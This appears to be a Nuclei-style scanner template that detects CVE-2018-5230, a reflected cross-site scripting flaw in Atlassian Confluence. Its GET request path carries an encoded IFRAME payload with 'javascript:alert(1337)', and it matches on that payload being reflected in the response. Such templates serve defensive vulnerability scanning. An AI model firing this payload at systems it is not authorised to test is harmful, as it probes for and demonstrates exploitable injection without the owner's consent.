id: CVE-2018-5230 info: name: Atlassian Confluence Status-List XSS author: madrobot severity: medium requests: - method: GET path: - "{{BaseURL}}/pages/includes/status-list-mo%3CIFRAME%20SRC%3D%22javascript%3Aalert%281337%29%22%3E.vm" matchers-condition: and matchers: - type: status status: - 200 - type: word words: - "SRC=\"javascript:alert(1337)\">" part: body